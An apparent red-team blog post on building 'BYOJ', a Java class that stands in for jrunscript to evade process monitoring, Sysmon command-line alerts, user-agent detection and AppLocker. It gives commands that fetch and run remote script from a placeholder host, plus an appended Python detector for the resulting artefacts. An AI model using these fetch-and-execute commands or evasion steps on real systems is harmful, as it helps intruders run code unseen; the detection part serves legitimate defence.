This blog post will cover how you can build your own JRunscript, which can be used on a desired machine. It will also cover some evasion methods you can utilize in your own JRunscript, which will evade some of the recommended defensive security controls that I outlined in one of my previous blog posts. I created a Proof of Concept (PoC) of BYOJ that is highlighted in this post, which I have linked below.
Advantages of BYOJ:
- Ability to evade process monitoring and full command-line logging rules that look for a "jrunscript.exe" process running or being created.
- Multi-platform compatibility (Windows, macOS, Linux), since it runs in the Java Virtual Machine (JVM).
Disadvantages of BYOJ:
- Requires dropping the compiled BYOJ file to disk.
|Snippet of BYOJ PoC - Exec Function|
If a function is shown as native to the script engine (e.g., load), you can call it directly through the eval method of the ScriptEngine object.
|Snippet of BYOJ PoC - Calling Native Load Function|
Putting It All Together
After you have implemented all of your functions, you can put some logic in your main method, along with any applicable switches, to make it user friendly. The only switch I was focused on was the "-e" switch, which is the switch JRunscript uses to call the various functions. You could of course customize this to be anything. You can compile your code and transfer the .class file to the desired machine(s) to be run directly with the java executable. There is no need to export it as a JAR to be run.
This will create a "BYOJ.class" file. You can transfer it to the desired machine(s) and invoke it as shown below, using the "exec" function as an example. Note that you do not need to specify the ".class" extension.
java BYOJ -e "exec('whoami')"
Some examples of other supported functions and usage in the BYOJ PoC are shown below.
java BYOJ -e "load('http://x.x.x.x/blah.js')"
java BYOJ -e "cat('http://x.x.x.x/blah.js')"
java BYOJ -e "cp('http://x.x.x.x/blah.js','C:\\Temp\\something.txt')"
Defensive Control Evasion Using BYOJ
While utilizing BYOJ, you can evade a number of the defensive security controls that I outlined in my previous post on this topic.
User-Agent String Detection
Below you will see an example of using BYOJ to download a file with a custom user-agent string. The user-agent string specified represents IE 11 on Windows 8.1, chosen to blend in with normal traffic. Note that when the native load function is used, the "Java/<version>" string is still appended, even when a custom user-agent is specified.
|Downloading File w/ BYOJ|
|Apache Log Entry - Downloading File w/ BYOJ|
Process Monitoring Detection
Process monitoring rules that look for "jrunscript.exe" running are evaded by BYOJ, since "jrunscript.exe" is never started.
|Process Monitoring - BYOJ Running|
Full Command-Line Detection
If Sysmon is running and its event logs are being sent to a SIEM with alerts built for "jrunscript.exe" process-create events, BYOJ will evade them, since no "jrunscript.exe" process is created. In this case, a "java.exe" process is created and executes the compiled BYOJ class file.
|Event Log from Sysmon - BYOJ Process Creation|
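The two gaps described above (the "Java/<version>" suffix the native load function leaves in the user-agent, and java.exe rather than jrunscript.exe appearing in process-create events) both leave artefacts a defender can key on. The following added example, which is not part of the original post or the BYOJ PoC, runs two such checks over constructed sample records: a Sysmon-style process event set and two Apache combined-format log lines (all values, including the client IPs, paths and Java version, are made up).

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Program Files\Java\jre\bin\java.exe",
     "CommandLine": "java BYOJ -e \"exec('whoami')\""},
    {"Image": r"C:\Program Files\Java\jre\bin\jrunscript.exe",
     "CommandLine": "jrunscript -e \"exec('whoami')\""},
    {"Image": r"C:\Program Files\Java\jre\bin\java.exe",
     "CommandLine": "java -jar app.jar --port 8080"},
]

# Constructed Apache combined-format lines. The first carries the "Java/<version>"
# suffix that the native load function appends even to a custom user-agent string.
SAMPLE_APACHE_LINES = [
    '10.0.0.5 - - [01/Jan/2020:12:00:00 +0000] "GET /blah.js HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Java/1.8.0_241"',
    '10.0.0.6 - - [01/Jan/2020:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"',
]

JAVA_IMAGES = {"java.exe", "javaw.exe", "jrunscript.exe"}
SCRIPT_FLAG = re.compile(r"(^|\s)-e\s")   # the jrunscript-style "-e" switch
UA_FIELD = re.compile(r'"([^"]*)"\s*$')   # last quoted field is the user-agent
JAVA_UA = re.compile(r"\bJava/\d")        # the appended "Java/<version>" marker


def flag_script_launches(events):
    """Return (image, command line) for any JRE binary launched with a -e switch.
    Keying on the switch rather than the image name also catches java.exe running
    a BYOJ-style class, which an image-name rule for jrunscript.exe misses."""
    hits = []
    for ev in events:
        image = ev["Image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if image in JAVA_IMAGES and SCRIPT_FLAG.search(ev["CommandLine"]):
            hits.append((image, ev["CommandLine"]))
    return hits


def flag_java_user_agents(lines):
    """Return (client ip, user-agent) for requests whose UA carries Java/<version>."""
    hits = []
    for line in lines:
        m = UA_FIELD.search(line)
        if m and JAVA_UA.search(m.group(1)):
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits


if __name__ == "__main__":
    print(flag_script_launches(SAMPLE_PROCESS_EVENTS))
    print(flag_java_user_agents(SAMPLE_APACHE_LINES))
```

The "-jar" launch is deliberately left unflagged so the rule does not fire on ordinary Java applications.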
BYOJ is executed via the "java.exe" executable, which is a signed Oracle binary that resides in %PROGRAMFILES% or %PROGRAMFILES(x86)% in a default installation. As such, this will still evade the default AppLocker executable rules that are listed at the below link.